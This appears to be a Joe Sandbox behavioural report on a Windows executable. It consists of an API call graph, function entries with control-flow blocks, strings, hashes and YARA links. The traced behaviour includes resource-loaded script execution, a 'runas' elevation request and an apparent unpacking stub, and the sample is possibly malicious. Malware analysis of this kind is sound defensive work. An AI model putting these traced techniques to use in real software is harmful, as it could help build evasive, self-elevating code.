97753->97754 97755 d74342 97754->97755 97756 d793b2 22 API calls 97755->97756 97765 d74378 97755->97765 97757 d7436c 97756->97757 97759 d737a0 22 API calls 97757->97759 97758 d7441b GetCurrentProcess IsWow64Process 97760 d74437 97758->97760 97759->97765 97761 d7444f LoadLibraryA 97760->97761 97762 db3824 GetSystemInfo 97760->97762 97763 d74460 GetProcAddress 97761->97763 97764 d7449c GetSystemInfo 97761->97764 97763->97764 97767 d74470 GetNativeSystemInfo 97763->97767 97768 d74476 97764->97768 97765->97758 97766 db37df 97765->97766 97767->97768 97769 d7109d 97768->97769 97770 d7447a FreeLibrary 97768->97770 97771 d900a3 29 API calls __onexit 97769->97771 97770->97769 97771->97750 97772 d71044 97777 d710f3 97772->97777 97774 d7104a 97813 d900a3 29 API calls __onexit 97774->97813 97776 d71054 97814 d71398 97777->97814 97781 d7116a 97782 d7a961 22 API calls 97781->97782 97783 d71174 97782->97783 97784 d7a961 22 API calls 97783->97784 97785 d7117e 97784->97785 97786 d7a961 22 API calls 97785->97786 97787 d71188 97786->97787 97788 d7a961 22 API calls 97787->97788 97789 d711c6 97788->97789 97790 d7a961 22 API calls 97789->97790 97791 d71292 97790->97791 97824 d7171c 97791->97824 97795 d712c4 97796 d7a961 22 API calls 97795->97796 97797 d712ce 97796->97797 97798 d81940 9 API calls 97797->97798 97799 d712f9 97798->97799 97845 d71aab 97799->97845 97801 d71315 97802 d71325 GetStdHandle 97801->97802 97803 d7137a 97802->97803 97804 db2485 97802->97804 97808 d71387 OleInitialize 97803->97808 97804->97803 97805 db248e 97804->97805 97806 d8fddb 22 API calls 97805->97806 97807 db2495 97806->97807 97852 de011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97807->97852 97808->97774 97810 db249e 97853 de0944 CreateThread 97810->97853 97812 db24aa CloseHandle 97812->97803 97813->97776 97854 d713f1 97814->97854 97817 d713f1 22 API calls 97818 d713d0 97817->97818 97819 d7a961 22 API calls 97818->97819 97820 d713dc 97819->97820 97821 d76b57 22 API calls 97820->97821 97822 d71129 97821->97822 97823 d71bc3 6 API calls 97822->97823 97823->97781 97825 d7a961 22 API calls 97824->97825 97826 d7172c 97825->97826 97827 d7a961 22 API calls 97826->97827 97828 d71734 97827->97828 97829 d7a961 22 API calls 97828->97829 97830 d7174f 97829->97830 97831 d8fddb 22 API calls 97830->97831 97832 d7129c 97831->97832 97833 d71b4a 97832->97833 97834 d71b58 97833->97834 97835 d7a961 22 API calls 97834->97835 97836 d71b63 97835->97836 97837 d7a961 22 API calls 97836->97837 97838 d71b6e 97837->97838 97839 d7a961 22 API calls 97838->97839 97840 d71b79 97839->97840 97841 d7a961 22 API calls 97840->97841 97842 d71b84 97841->97842 97843 d8fddb 22 API calls 97842->97843 97844 d71b96 RegisterClipboardFormatW 97843->97844 97844->97795 97846 db272d 97845->97846 97847 d71abb 97845->97847 97861 de3209 23 API calls 97846->97861 97849 d8fddb 22 API calls 97847->97849 97851 d71ac3 97849->97851 97850 db2738 97851->97801 97852->97810 97853->97812 97862 de092a 28 API calls 97853->97862 97855 d7a961 22 API calls 97854->97855 97856 d713fc 97855->97856 97857 d7a961 22 API calls 97856->97857 97858 d71404 97857->97858 97859 d7a961 22 API calls 97858->97859 97860 d713c6 97859->97860 97860->97817 97861->97850 97863 d72de3 97864 d72df0 __wsopen_s 97863->97864 97865 d72e09 97864->97865 97867 db2c2b ___scrt_fastfail 97864->97867 97866 d73aa2 23 API calls 97865->97866 97868 d72e12 97866->97868 97872 d76b57 22 API calls 97867->97872 97877 d72da5 97868->97877 97874 db2cab 97872->97874 97873 d72e27 97895 d744a8 97873->97895 97874->97874 97878 db1f50 __wsopen_s 97877->97878 97879 d72db2 GetLongPathNameW 97878->97879 97880 d76b57 22 API calls 97879->97880 97881 d72dda 97880->97881 97882 d73598 97881->97882 97883 d7a961 22 API calls 97882->97883 97884 d735aa 97883->97884 97885 d73aa2 23 API calls 97884->97885 97886 d735b5 97885->97886 97887 d735c0 97886->97887 97892 db32eb 97886->97892 97889 d7515f 22 API calls 97887->97889 97890 d735cc 97889->97890 97925 d735f3 97890->97925 97891 db330d 97892->97891 97931 d8ce60 41 API calls 97892->97931 97894 d735df 97894->97873 97896 d74ecb 94 API calls 97895->97896 97897 d744cd 97896->97897 97898 db3833 97897->97898 97900 d74ecb 94 API calls 97897->97900 97899 de2cf9 80 API calls 97898->97899 97902 db3848 97899->97902 97901 d744e1 97900->97901 97901->97898 97903 d744e9 97901->97903 97904 db3869 97902->97904 97905 db384c 97902->97905 97906 d744f5 97903->97906 97907 db3854 97903->97907 97909 d8fe0b 22 API calls 97904->97909 97908 d74f39 68 API calls 97905->97908 97932 d7940c 136 API calls 2 library calls 97906->97932 97933 ddda5a 82 API calls 97907->97933 97908->97907 97916 db38ae 97909->97916 97912 d72e31 97913 db3862 97913->97904 97914 db3a5f 97918 db3a67 97914->97918 97915 d74f39 68 API calls 97915->97918 97916->97914 97916->97918 97922 d79cb3 22 API calls 97916->97922 97934 dd967e 22 API calls __fread_nolock 97916->97934 97935 dd95ad 42 API calls _wcslen 97916->97935 97936 de0b5a 22 API calls 97916->97936 97937 d7a4a1 22 API calls __fread_nolock 97916->97937 97938 d73ff7 22 API calls 97916->97938 97918->97915 97939 dd989b 82 API calls __wsopen_s 97918->97939 97922->97916 97926 d73605 97925->97926 97930 d73624 __fread_nolock 97925->97930 97929 d8fe0b 22 API calls 97926->97929 97927 d8fddb 22 API calls 97928 d7363b 97927->97928 97928->97894 97929->97930 97930->97927 97931->97892 97932->97912 97933->97913 97934->97916 97935->97916 97936->97916 97937->97916 97938->97916 97939->97918 97940 da8402 97945 da81be 97940->97945 97943 da842a 97950 da81ef try_get_first_available_module 97945->97950 97947 da83ee 97964 da27ec 26 API calls _abort 97947->97964 97949 da8343 97949->97943 97957 db0984 97949->97957 97953 da8338 97950->97953 97960 d98e0b 40 API calls 2 library calls 97950->97960 97952 da838c 97952->97953 97961 d98e0b 40 API calls 2 library calls 97952->97961 97953->97949 97963 d9f2d9 20 API calls _abort 97953->97963 97955 da83ab 97955->97953 97962 d98e0b 40 API calls 2 library calls 97955->97962 97965 db0081 97957->97965 97959 db099f 97959->97943 97960->97952 97961->97955 97962->97953 97963->97947 97964->97949 97966 db008d ___BuildCatchObject 97965->97966 97967 db009b 97966->97967 97969 db00d4 97966->97969 98022 d9f2d9 20 API calls _abort 97967->98022 97976 db065b 97969->97976 97970 db00a0 98023 da27ec 26 API calls _abort 97970->98023 97975 db00aa __fread_nolock 97975->97959 97977 db0678 97976->97977 97978 db068d 97977->97978 97979 db06a6 97977->97979 98039 d9f2c6 20 API calls _abort 97978->98039 98025 da5221 97979->98025 97982 db0692 98040 d9f2d9 20 API calls _abort 97982->98040 97983 db06ab 97984 db06cb 97983->97984 97985 db06b4 97983->97985 98038 db039a CreateFileW 97984->98038 98041 d9f2c6 20 API calls _abort 97985->98041 97989 db06b9 98042 d9f2d9 20 API calls _abort 97989->98042 97991 db0781 GetFileType 97993 db078c GetLastError 97991->97993 97994 db07d3 97991->97994 97992 db0756 GetLastError 98044 d9f2a3 20 API calls __dosmaperr 97992->98044 98045 d9f2a3 20 API calls __dosmaperr 97993->98045 98047 da516a 21 API calls 2 library calls 97994->98047 97995 db0704 97995->97991 97995->97992 98043 db039a CreateFileW 97995->98043 97999 db079a CloseHandle 97999->97982 98002 db07c3 97999->98002 98001 db0749 98001->97991 98001->97992 98046 d9f2d9 20 API calls _abort 98002->98046 98003 db07f4 98005 db0840 98003->98005 98048 db05ab 72 API calls 3 library calls 98003->98048 98011 db086d 98005->98011 98049 db014d 72 API calls 4 library calls 98005->98049 98006 db07c8 98006->97982 98009 db0866 98010 db087e 98009->98010 98009->98011 98013 db00f8 98010->98013 98014 db08fc CloseHandle 98010->98014 98012 da86ae __wsopen_s 29 API calls 98011->98012 98012->98013 98024 db0121 RtlLeaveCriticalSection __wsopen_s 98013->98024 98050 db039a CreateFileW 98014->98050 98016 db0927 98017 db095d 98016->98017 98018 db0931 GetLastError 98016->98018 98017->98013 98051 d9f2a3 20 API calls __dosmaperr 98018->98051 98020 db093d 98052 da5333 21 API calls 2 library calls 98020->98052 98022->97970 98023->97975 98024->97975 98026 da522d ___BuildCatchObject 98025->98026 98053 da2f5e RtlEnterCriticalSection 98026->98053 98028 da527b 98054 da532a 98028->98054 98030 da5259 98057 da5000 21 API calls 3 library calls 98030->98057 98031 da5234 98031->98028 98031->98030 98035 da52c7 RtlEnterCriticalSection 98031->98035 98032 da52a4 __fread_nolock 98032->97983 98034 da525e 98034->98028 98058 da5147 RtlEnterCriticalSection 98034->98058 98035->98028 98036 da52d4 RtlLeaveCriticalSection 98035->98036 98036->98031 98038->97995 98039->97982 98040->98013 98041->97989 98042->97982 98043->98001 98044->97982 98045->97999 98046->98006 98047->98003 98048->98005 98049->98009 98050->98016 98051->98020 98052->98017 98053->98031 98059 da2fa6 RtlLeaveCriticalSection 98054->98059 98056 da5331 98056->98032 98057->98034 98058->98028 98059->98056 98060 d71cad SystemParametersInfoW 98061 eb7730 98062 eb7740 98061->98062 98063 eb785a LoadLibraryA 98062->98063 98064 eb789f VirtualProtect VirtualProtect 98062->98064 98065 eb7871 98063->98065 98068 eb7904 98064->98068 98065->98062 98067 eb7883 GetProcAddress 98065->98067 98067->98065 98069 eb7899 ExitProcess 98067->98069 98068->98068 98070 dc2a00 98085 d7d7b0 ISource 98070->98085 98071 d7db11 PeekMessageW 98071->98085 98072 d7d807 GetInputState 98072->98071 98072->98085 98074 dc1cbe TranslateAcceleratorW 98074->98085 98075 d7db8f PeekMessageW 98075->98085 98076 d7da04 timeGetTime 98076->98085 98077 d7db73 TranslateMessage DispatchMessageW 98077->98075 98078 d7dbaf Sleep 98096 d7dbc0 98078->98096 98079 dc2b74 Sleep 98079->98096 98080 d8e551 timeGetTime 98080->98096 98081 dc1dda timeGetTime 98131 d8e300 23 API calls 98081->98131 98084 dc2c0b GetExitCodeProcess 98087 dc2c37 CloseHandle 98084->98087 98088 dc2c21 WaitForSingleObject 98084->98088 98085->98071 98085->98072 98085->98074 98085->98075 98085->98076 98085->98077 98085->98078 98085->98079 98085->98081 98086 d7d9d5 98085->98086 98098 d7ec40 256 API calls 98085->98098 98099 d81310 256 API calls 98085->98099 98100 d7bf40 256 API calls 98085->98100 98102 d7dfd0 98085->98102 98125 d8edf6 98085->98125 98130 d7dd50 256 API calls 98085->98130 98132 de3a2a 23 API calls 98085->98132 98133 de359c 82 API calls __wsopen_s 98085->98133 98087->98096 98088->98085 98088->98087 98089 dc2a31 98089->98086 98090 e029bf GetForegroundWindow 98090->98096 98092 dc2ca9 Sleep 98092->98085 98096->98080 98096->98084 98096->98085 98096->98086 98096->98089 98096->98090 98096->98092 98134 df5658 23 API calls 98096->98134 98135 dde97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98096->98135 98136 ddd4dc 47 API calls 98096->98136 98098->98085 98099->98085 98100->98085 98103 d7e010 98102->98103 98120 d7e0dc ISource 98103->98120 98139 d90242 5 API calls __Init_thread_wait 98103->98139 98106 dc2fca 98108 d7a961 22 API calls 98106->98108 98106->98120 98107 d7a961 22 API calls 98107->98120 98111 dc2fe4 98108->98111 98140 d900a3 29 API calls __onexit 98111->98140 98113 dc2fee 98141 d901f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 98113->98141 98116 d7ec40 256 API calls 98116->98120 98118 d7a8c7 22 API calls 98118->98120 98119 d804f0 22 API calls 98119->98120 98120->98107 98120->98116 98120->98118 98120->98119 98121 d7e3e1 98120->98121 98123 de359c 82 API calls 98120->98123 98137 d7a81b 41 API calls 98120->98137 98138 d8a308 256 API calls 98120->98138 98142 d90242 5 API calls __Init_thread_wait 98120->98142 98143 d900a3 29 API calls __onexit 98120->98143 98144 d901f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 98120->98144 98145 df47d4 256 API calls 98120->98145 98146 df68c1 256 API calls 98120->98146 98121->98085 98123->98120 98127 d8ee09 98125->98127 98128 d8ee12 98125->98128 98126 d8ee36 IsDialogMessageW 98126->98127 98126->98128 98127->98085 98128->98126 98128->98127 98129 dcefaf GetClassLongW 98128->98129 98129->98126 98129->98128 98130->98085 98131->98085 98132->98085 98133->98085 98134->98096 98135->98096 98136->98096 98137->98120 98138->98120 98139->98106 98140->98113 98141->98120 98142->98120 98143->98120 98144->98120 98145->98120 98146->98120 98147 db2ba5 98148 d72b25 98147->98148 98149 db2baf 98147->98149 98175 d72b83 7 API calls 98148->98175 98151 d73a5a 24 API calls 98149->98151 98153 db2bb8 98151->98153 98155 d79cb3 22 API calls 98153->98155 98157 db2bc6 98155->98157 98156 d72b2f 98161 d73837 49 API calls 98156->98161 98162 d72b44 98156->98162 98158 db2bce 98157->98158 98159 db2bf5 98157->98159 98163 d733c6 22 API calls 98158->98163 98160 d733c6 22 API calls 98159->98160 98164 db2bf1 GetForegroundWindow ShellExecuteW 98160->98164 98161->98162 98167 d72b5f 98162->98167 98179 d730f2 Shell_NotifyIconW ___scrt_fastfail 98162->98179 98165 db2bd9 98163->98165 98169 db2c26 98164->98169 98168 d76350 22 API calls 98165->98168 98172 d72b66 SetCurrentDirectoryW 98167->98172 98171 db2be7 98168->98171 98169->98167 98173 d733c6 22 API calls 98171->98173 98174 d72b7a 98172->98174 98173->98164 98180 d72cd4 GetSysColorBrush RegisterClassExW RegisterClipboardFormatW 98175->98180 98178 d72c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98178->98156 98179->98167 98181 d72d65 LoadIconW 98180->98181 98183 d72b2a 98181->98183 98183->98178

                                              Executed Functions

                                              Function 00D742DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 234 d742de-d7434d call d7a961 GetVersionExW call d76b57 239 d74353 234->239 240 db3617-db362a 234->240 241 d74355-d74357 239->241 242 db362b-db362f 240->242 243 d7435d-d743bc call d793b2 call d737a0 241->243 244 db3656 241->244 245 db3632-db363e 242->245 246 db3631 242->246 263 db37df-db37e6 243->263 264 d743c2-d743c4 243->264 249 db365d-db3660 244->249 245->242 248 db3640-db3642 245->248 246->245 248->241 251 db3648-db364f 248->251 253 d7441b-d74435 GetCurrentProcess IsWow64Process 249->253 254 db3666-db36a8 249->254 251->240 252 db3651 251->252 252->244 256 d74437 253->256 257 d74494-d7449a 253->257 254->253 258 db36ae-db36b1 254->258 260 d7443d-d74449 256->260 257->260 261 db36db-db36e5 258->261 262 db36b3-db36bd 258->262 265 d7444f-d7445e LoadLibraryA 260->265 266 db3824-db3828 GetSystemInfo 260->266 270 db36f8-db3702 261->270 271 db36e7-db36f3 261->271 267 db36ca-db36d6 262->267 268 db36bf-db36c5 262->268 272 db37e8 263->272 273 db3806-db3809 263->273 264->249 269 d743ca-d743dd 264->269 276 d74460-d7446e GetProcAddress 265->276 277 d7449c-d744a6 GetSystemInfo 265->277 267->253 268->253 278 d743e3-d743e5 269->278 279 db3726-db372f 269->279 281 db3715-db3721 270->281 282 db3704-db3710 270->282 271->253 280 db37ee 272->280 274 db380b-db381a 273->274 275 db37f4-db37fc 273->275 274->280 285 db381c-db3822 274->285 275->273 276->277 286 d74470-d74474 GetNativeSystemInfo 276->286 287 d74476-d74478 277->287 288 db374d-db3762 278->288 289 d743eb-d743ee 278->289 283 db373c-db3748 279->283 284 db3731-db3737 279->284 280->275 281->253 282->253 283->253 284->253 285->275 286->287 292 d74481-d74493 287->292 293 d7447a-d7447b FreeLibrary 287->293 290 db376f-db377b 288->290 291 db3764-db376a 288->291 294 d743f4-d7440f 289->294 295 db3791-db3794 289->295 290->253 291->253 293->292 297 d74415 294->297 298 db3780-db378c 294->298 295->253 296 db379a-db37c1 295->296 299 db37ce-db37da 296->299 300 db37c3-db37c9 296->300 297->253 298->253 299->253 300->253
                                              APIs
                                              • GetVersionExW.KERNEL32(?), ref: 00D7430D
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              • GetCurrentProcess.KERNEL32(?,00E0CB64,00000000,?,?), ref: 00D74422
                                              • IsWow64Process.KERNEL32(00000000,?,?), ref: 00D74429
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00D74454
                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D74466
                                              • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00D74474
                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 00D7447B
                                              • GetSystemInfo.KERNEL32(?,?,?), ref: 00D744A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                              • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                              • API String ID: 3290436268-3101561225
                                              • Opcode ID: a579d16170cd31cefbdf85173fd9728161fd78d0e8e2595b46a840c2c6e39f0e
                                              • Instruction ID: 6d10d0e06d4cd12f24074525b4585b0244b26fb976591d7e58e95f2714744090
                                              • Opcode Fuzzy Hash: a579d16170cd31cefbdf85173fd9728161fd78d0e8e2595b46a840c2c6e39f0e
                                              • Instruction Fuzzy Hash: E8A1966A90A2C0DFCF12CF6B7C411E57FA46B27744B1A94E9D085B3A22E76045CEDB31
                                              Function 00D73170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145timewindowregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 442 d73170-d73185 443 d73187-d7318a 442->443 444 d731e5-d731e7 442->444 446 d7318c-d73193 443->446 447 d731eb 443->447 444->443 445 d731e9 444->445 448 d731d0-d731d8 NtdllDefWindowProc_W 445->448 451 d73265-d7326d PostQuitMessage 446->451 452 d73199-d7319e 446->452 449 db2dfb-db2e23 call d718e2 call d8e499 447->449 450 d731f1-d731f6 447->450 455 d731de-d731e4 448->455 485 db2e28-db2e2f 449->485 457 d7321d-d73244 SetTimer RegisterClipboardFormatW 450->457 458 d731f8-d731fb 450->458 456 d73219-d7321b 451->456 453 d731a4-d731a8 452->453 454 db2e7c-db2e90 call ddbf30 452->454 461 db2e68-db2e72 call ddc161 453->461 462 d731ae-d731b3 453->462 454->456 479 db2e96 454->479 456->455 457->456 463 d73246-d73251 CreatePopupMenu 457->463 465 d73201-d73214 KillTimer call d730f2 call d73c50 458->465 466 db2d9c-db2d9f 458->466 475 db2e77 461->475 468 db2e4d-db2e54 462->468 469 d731b9-d731be 462->469 463->456 465->456 471 db2da1-db2da5 466->471 472 db2dd7-db2df6 MoveWindow 466->472 468->448 482 db2e5a-db2e63 call dd0ad7 468->482 477 d731c4-d731ca 469->477 478 d73253-d73263 call d7326f 469->478 480 db2da7-db2daa 471->480 481 db2dc6-db2dd2 SetFocus 471->481 472->456 475->456 477->448 477->485 478->456 479->448 480->477 486 db2db0-db2dc1 call d718e2 480->486 481->456 482->448 485->448 490 db2e35-db2e48 call d730f2 call d73837 485->490 486->456 490->448
                                              APIs
                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?,?,?,?,?,?,00D7316A,?,?), ref: 00D731D8
                                              • KillTimer.USER32(?,00000001,?,?,?,?,?,00D7316A,?,?), ref: 00D73204
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D73227
                                              • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D73232
                                              • CreatePopupMenu.USER32 ref: 00D73246
                                              • PostQuitMessage.USER32(00000000), ref: 00D73267
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                              • String ID: TaskbarCreated
                                              • API String ID: 157504867-2362178303
                                              • Opcode ID: 23d767af6d52c05cc3dc61297c087a78e6d5d9f415f45ca49a177c01725a0088
                                              • Instruction ID: a683934180d78ff8abba69399eaec1c2c0a6d767b2a347f7c739266203be3a1b
                                              • Opcode Fuzzy Hash: 23d767af6d52c05cc3dc61297c087a78e6d5d9f415f45ca49a177c01725a0088
                                              • Instruction Fuzzy Hash: D7419B35250300EFDF141F789C0ABB93B15E746340F1C821AF94EA12A2F771CA85A7B6
                                              Function 00D742A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1174 d742a2-d742ba CreateStreamOnHGlobal 1175 d742bc-d742d3 FindResourceExW 1174->1175 1176 d742da-d742dd 1174->1176 1177 db35ba-db35c9 LoadResource 1175->1177 1178 d742d9 1175->1178 1177->1178 1179 db35cf-db35dd SizeofResource 1177->1179 1178->1176 1179->1178 1180 db35e3-db35ee LockResource 1179->1180 1180->1178 1181 db35f4-db35fc 1180->1181 1182 db3600-db3612 1181->1182 1182->1178
                                              APIs
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D742B2
                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D750AA,?,?,00000000,00000000), ref: 00D742C9
                                              • LoadResource.KERNEL32(?,00000000,?,?,00D750AA,?,?,00000000,00000000,?,?,?,?,?,?,00D74F20), ref: 00DB35BE
                                              • SizeofResource.KERNEL32(?,00000000,?,?,00D750AA,?,?,00000000,00000000,?,?,?,?,?,?,00D74F20), ref: 00DB35D3
                                              • LockResource.KERNEL32(00D750AA,?,?,00D750AA,?,?,00000000,00000000,?,?,?,?,?,?,00D74F20,?), ref: 00DB35E6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                              • String ID: SCRIPT
                                              • API String ID: 3051347437-3967369404
                                              • Opcode ID: 42e1084941dc9b9cedefa977a81c700e8e6940d234c0a3ca3434c278eacd1a3a
                                              • Instruction ID: 2505c596862f7a8c5e0e53f57648fc17072a42c15d2d034f585704b99924cff2
                                              • Opcode Fuzzy Hash: 42e1084941dc9b9cedefa977a81c700e8e6940d234c0a3ca3434c278eacd1a3a
                                              • Instruction Fuzzy Hash: B1118E70201701BFD7228B66DC48F677BBDEBC5B51F248269F406E66A0EB72DC548A30
                                              Function 00DB2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00D72B6B
                                                • Part of subcall function 00D73A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E41418,?,00D72E7F,?,?,?,00000000), ref: 00D73A78
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • GetForegroundWindow.USER32(runas,?,?,?,?,?,00E32224), ref: 00DB2C10
                                              • ShellExecuteW.SHELL32(00000000,?,?,00E32224), ref: 00DB2C17
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                              • String ID: runas
                                              • API String ID: 448630720-4000483414
                                              • Opcode ID: cb1eb630d7c6effb230a103604ae5cff8689ab70cd4c04541d1ce86b6b3f49f9
                                              • Instruction ID: fc0555b241ac7b9720740779ff3ad4963f7c80ddb948475ad347426900266044
                                              • Opcode Fuzzy Hash: cb1eb630d7c6effb230a103604ae5cff8689ab70cd4c04541d1ce86b6b3f49f9
                                              • Instruction Fuzzy Hash: 8C11B7321043455ACB14FF64D8569BEBBA4DBD5300F08941DF19A220A2FF31994AD732
                                              Function 00DDDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(?,00DB5222), ref: 00DDDBCE
                                              • GetFileAttributesW.KERNELBASE(?), ref: 00DDDBDD
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00DDDBEE
                                              • FindClose.KERNEL32(00000000), ref: 00DDDBFA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FileFind$AttributesCloseFirstlstrlen
                                              • String ID:
                                              • API String ID: 2695905019-0
                                              • Opcode ID: aeca2eba9701457df9891a174a59dd8a56645c6f1d6849decd18c285fbb89ecd
                                              • Instruction ID: 6fc12009332472e60764a62f3464b037a5f8d4416911361c9b4270e3257ff5b5
                                              • Opcode Fuzzy Hash: aeca2eba9701457df9891a174a59dd8a56645c6f1d6849decd18c285fbb89ecd
